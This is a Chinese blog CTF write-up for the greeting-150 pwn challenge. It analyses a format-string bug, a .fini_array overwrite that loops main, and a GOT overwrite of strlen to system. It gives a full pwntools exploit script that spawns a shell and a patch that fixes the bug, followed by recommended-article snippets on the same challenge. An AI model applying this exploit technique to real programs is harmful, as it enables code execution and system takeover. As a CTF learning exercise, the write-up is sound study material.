攻防世界greeting-150——进阶格式化字符串

最新推荐文章于 2023-07-23 15:39:58 发布
最新推荐文章于 2023-07-23 15:39:58 发布
阅读量554 收藏 3
点赞数
分类专栏: 学习笔记 文章标签: 格式化字符串 pwn fini_array GOT
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_48066554/article/details/124894730
版权

攻防世界greeting-150——进阶格式化字符串

文章目录

引入

小白不懂事,做着玩的

初步分析

1、checksec

没有pie,got完全可写,种种迹象表明got表准备好了被淦

2、伪代码
int __cdecl main(int argc, const char **argv, const char **envp)
{
  char s[64]; // [esp+1Ch] [ebp-84h] BYREF
  char v5[64]; // [esp+5Ch] [ebp-44h] BYREF
  unsigned int v6; // [esp+9Ch] [ebp-4h]

  v6 = __readgsdword(0x14u);
  printf("Please tell me your name... ");
  if ( !getnline(v5, 64) )
    return puts("Don't ignore me ;( ");
  sprintf(s, "Nice to meet you, %s :)\n", v5);
  return printf(s);
}

先读入v5,然后读入s,最后printf输入的字符串,明显的格式化字符串

3、运行

在这里插入图片描述

发现运行时在main函数的输出前还有一个输出,查阅资料:在执行main之前会先执行大量函数,其中就有init_array中的函数指针对应的函数。相对应的,在执行main函数后,也会执行大量函数,同样包括fini_array中的函数指针对应的函数。程序执行的流程如下所示。

在这里插入图片描述

所以我们查看程序中对应的段,找到这两个段的位置,发现init_array中确实保存了一个函数nao的offset

在这里插入图片描述

函数nao的内容

在这里插入图片描述

4、栈分析

在这里插入图片描述

参数偏移为11,不明白的可以看这两篇博客:

思路分析

1、持续控制

目的是got表,程序中有格式化字符串漏洞,那么可以直接构造栈达到任意地址写的目的

首先需要使用格式化字符串把got表内一个函数地址改为system地址,这里选择了参数符合要求的且易于调用的strlen函数,然后函数会结束并返回。

为了达到持续控制的目的,这时需要让main函数执行结束后再执行一遍,所以前面提及的fini_array就起作用了,如果我们把main函数的地址写入表中,就可以在main执行之后无限续杯了

相关地址

main_addr = 0x080485ED
fini_array = 0x08049934
system_plt = 0x08048490
strlen_got = 0x08049A54

查询一下fini_array里原来保存的是什么

pwndbg> x/wx 0x08049934
0x8049934:   0x080485a0

因为地址与main的相近,覆盖的时候只需覆盖低4位即可

2、任意地址写

为了达到任意地址写的目的,需要使用格式化字符串里的%n参数,但是如果想要写入四个字节的话,可能会报错,所以这里为了增加成功几率,使用%hn参数,两个两个字节地覆盖。

关键,写入的时候要从小到大写入,因为%n写入的原理是把目标地址值修改为已输出的字符数

exp

from pwn import*
p=process('./greeting-150')

main_addr = 0x080485ED
fini_array = 0x08049934
system_plt = 0x08048490
strlen_got = 0x08049A54

fini_num = 0x85ED
sysplt_num1 = 0x0804
sysplt_num2 = 0x8490

p.recvuntil('Please tell me your name... ')
pl = b'a'*2
pl += p32(strlen_got)
pl += p32(strlen_got+2)  # 覆盖高4位
pl += p32(fini_array)
num = 0x804 - 0x20
pl += '%' + str(num) + 'c%13$hn'
num = 0x8490 - 0x804
pl += '%' + str(num) + 'c%12$hn'
num = 0x85ED - 0x8490
pl += '%' + str(num) + 'c%14$hn'
print(len(pl))
 
p.sendline(pl)
p.recvuntil('Please tell me your name... ')
p.sendline('/bin/sh')
p.interactive()
保留节目:修洞

把格式化字符串漏洞修复

修复前

.text:08048643                 call    _sprintf
.text:08048648                 lea     eax, [esp+0A0h+s]
.text:0804864C                 mov     [esp], eax      ; format
.text:0804864F                 call    _printf
.text:08048654                 jmp     short loc_8048662

修复后

.text:08048643                 call    _sprintf
.text:08048648                 lea     eax, [esp+0A0h+s]
.text:0804864C                 mov     [esp], eax      ; s
.text:0804864F                 call    puts     ; Keypatch modified this from:
.text:0804864F                                  ; call _printf
.text:08048654                 jmp     short loc_8048662
lunat:c
关注
专栏目录
Python基础入门----Python字符串操作:字符串基本操作、字符串方法、格式化
redrose2100的博客
11-07 128
Python的字符串操作方法非常丰富,涵盖了大小写转换、搜索替换、检查、修改、分割组合等多个方面。掌握这些方法将大大提高处理字符串的效率。同时,灵活运用字符串格式化技术,可以使输出更加人性化和易于理解。Python字符串是编程中常用的数据类型之一,它提供了一系列的内置方法,使得字符串操作变得简单高效。本文将通过代码示例详细介绍每种字符串方法的使用。字符串格式化是将变量插入到字符串中的过程。Python提供了多种格式化字符串的方法。
攻防世界之greeting-150
qq_42728977的博客
11-03 1595
题目链接:greeting-150 原理: 格式化字符串漏洞、覆盖 .fini_array 目的: 用格式化字符串漏洞制造程序循环,进而使普通格式化字符串漏洞可以被利用 环境: ubuntu14 64位 工具: pwntools 步骤: 用格式化字符串漏洞修改strlen或其他函数(能被调用且有可操纵字符串传入的函数)的got表为system地址plt地址,以及 .fini_array的4个字节为...
攻防世界进阶区——greeting-150
weixin_62675330的博客
04-10 4425
攻防世界进阶区——greeting-150 进阶区的格式化字符串漏洞,能做到这里的人肯定不差,我就不在重复写那些基础的东西了。 这里我尝试用了一下格式化字符串漏洞神器 FmtStr。 文件分析 先用checksec来查一下 coke@ubuntu:~/桌面/CTFworkstation/PWN/OADW/gretting_150$ checksec greeting_150 [*] '/home/coke/桌面/CTFworkstation/PWN/OADW/gretting_150/greeting_15
攻防世界】greeting-150
weixin_43960998的博客
03-28 1366
1.程序逆向 main 函数非常简单,存在一个只能利用一次的格式化字符串。 自定义 getnline 函数: 存在一个奇怪的函数,提供了 system,但是没用 /bin/sh : 2.前置知识 当程序中的漏洞只能利用一次,但是我们需要利用多次时,可以考虑修改 .fini_array,这里引用了参考文章的图: (图源 https://bbs.ichunqiu.com/thread-43624-1-1.html) 程序退出后会依次 .fini_array 中的每一个函数指针,那如果把 start 或者
攻防世界 Pwn greeting-150
MrTreebook的博客
02-26 581
攻防世界 Pwn greeting-1501.checksec检查保护2.IDA查看程序流程3.程序分析4.exp 1.checksec检查保护 root@ubuntu:~/Desktop/git/ctf-pwn# checksec secret_file [*] '/home/lwj/Desktop/git/ctf-pwn/secret_file' Arch: amd64-64-little RELRO: Full RELRO Stack: Canary fou
攻防世界格式化字符串漏洞greeting150
Rt1Text的博客
04-10 446
1.checksec+运行 32位/NX堆栈不可执行/Canary保护 注意一点:没有RELRO保护,got表完全可写 2.IDA常规操作 1.main函数 2.getnline函数 看到以上信息可以 泄露任意地址的内存 但是........上面的看着感觉不是很多对 原来是这样 出现了aaaa---->0x61616161,参数在格式化字符串第12个位置 aaaaaa%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,...
python3格式化字符串 f-string的高级用法(推荐)
09-17
print(f"当前时间是{now:%Y-%m-%d %H:%M:%S}") # 输出:当前时间的格式化字符串 ``` f-string的强大之处还在于它可以与其他Python表达式无缝结合,包括条件判断、循环等: ```python greeting = "你好" if "你好" ...
用js来格式化字符串示例模仿css
01-19
在深入探讨如何使用JavaScript来格式化字符串以模仿CSS风格之前,让我们首先了解一些基础概念。 首先,字符串是编程中非常基础且重要的数据类型,它是由字符组成的序列,比如单引号('')或双引号("")包裹的内容。在...
攻防世界PWN之greeting-150题解
seaaseesa的博客
11-09 2029
greeting-150 首先看一下保护机制 然后我们拖入IDA,发现是一个很简单的程序。 然而,最后的那个printf(&s);存在格式化字符串漏洞,可以造成任意地址的读写。 首先,我们需要确定我们输入的数据的相对位置。 经过测试,我们需要在前面填充2个字符,然后接下来我们的数据会位于第12个位置 那么,我们的payload = ‘aa’ + p32(a...
攻防世界greeting-150
weixin_56777139的博客
03-24 134
32位格式化字符出漏洞。
CTF PWN-攻防世界CGfsb格式化字符串漏洞
最新发布
道阻且长,行则将至。
07-23 2260
距离 2021 年年底短暂接触学习 CTF PWN 相关知识(CTF PWN-攻防世界XCTF新手区WriteUp)已经是快 2 年前的事了,这期间就连攻防世界社区的站点都发生巨大变化了……为了学习终端领域底层漏洞的挖掘和利用技术,继续积累 PWN 相关知识。
XCTF-攻防世界 CGfsb 格式化字符串漏洞
river
07-02 4186
攻防世界-CGfsb-格式化字符串漏洞 参考自 http://geekfz.cn/index.php/2019/06/12/pwn-format/ 程序拿下来丢到IDA F5 int __cdecl main(int argc, const char **argv, const char **envp) { int buf; // [esp+1Eh] [ebp-7Eh] int v5; ...
攻防世界详解CGfsb,格式化字符串漏洞,欢迎讨论
XDiku的博客
01-11 290
格式化字符串漏洞
攻防世界新手pwn题:CGfsb (格式化字符串漏洞)初解
qq_35066257的博客
09-25 852
攻防世界新手pwn题:CGfsb (格式化字符串漏洞)初解 在开始看这题之前,可以看CTF-wiki中有关格式化字符串漏洞的利用[link]https://wiki.x10sec.org/pwn/fmtstr/fmtstr_exploit/ 这边就简单的介绍格式化字符串中覆盖内存的方式:%n$n,这串字符的意思是将前面打印的字符个数,写入到第n个指针对应的地址中,下面就以CGfsb这题来举个例子 ...
greeting-150(xctf)
weixin_43868725的博客
08-10 693
0x0 程序保护和流程 保护: 流程: main() 存在一个明显的格式化字符串漏洞。 0x1 利用过程 1.格式化字符串漏洞的出现代表着只要有权限,就能完成任意地址写。而题目的保护是没有开启重定位表只读保护,所以可以修改函数的got表。所以可以修改一个参数由输入决定单参数函数的got表为sysytem函数的地址,这样就当输入**/bin/sh**的时候就可以完成getshell了。通过观察程序,决定修改strlen函数的got表。 2.由于需要二次输入,涉及到控制程序流程。而控制流程需要一个可执行的指
ADworld pwn wp - greeting-150
fa1c4的blog
06-27 245
格式化漏洞 这里可以任意地址读写, 思路是将got表中strlen的内容修改成system的plt, 这样调用strlen函数时, 相当于调用system, 在buf中写入"/bin/sh"就可以get shell
攻防世界XCTF:wtf.sh-150
末初的CSDN博客
03-09 1086
论坛站,先随便打开一个网站,发现url栏变化如下: 看到这种get一个变量接收传参的很容易让人想到,文件包含或者路径穿越,先试试路径穿越 出现了源码泄露,把这些代码复制下来,稍作整理 从这些源码种应该可以分析出这个admin账户应该是可以使用cookie登录的 接着找找看有没有什么有用的信息,在这些源码种搜索敏感一些字符看看 出现过许多关于users这个目录的信息,我们使用目录穿越…/...
攻防世界PWN之interpreter-200题解
seaaseesa的博客
02-06 619
interpreter-200 这是一个befunge程序解释器,befunge程序的语法参考https://www.jianshu.com/p/ed929cf72312,还有官方的文档在https://esolangs.org/wiki/Befunge 另外本文参考国外的一篇,加以自己的理解,做了简化 https://uaf.io/exploitation/2016/09/05/Tokyo...
pwn刷题num10-----格式化字符串漏洞
tbsqigongzi的博客
04-22 390
攻防世界pwn新手区string 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 64位,小端序 开启全部RELRO---got表不可写 开启canary保护---栈溢出需绕过canary 开启NX保护----注入的shellcode不可执行 未开启PIE----程序地址为真实地址 动态链接 英文意思是:我们是巫师,我们会给你手,你不能自己打败龙...... 我们会告诉你两个秘密......秘密 [0]是6662a0秘密[1]是6662a4 不要告诉任何人 你的
python3 f-string格式化字符串的高级用法
07-14
Python 3 中的 f-string 是一种方便的字符串格式化方法,在格式化字符串时具有一些高级用法。 首先,可以在 f-string 中使用表达式。除了简单的变量名外,还可以在大括号中使用任何有效的表达式,例如数学运算、...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值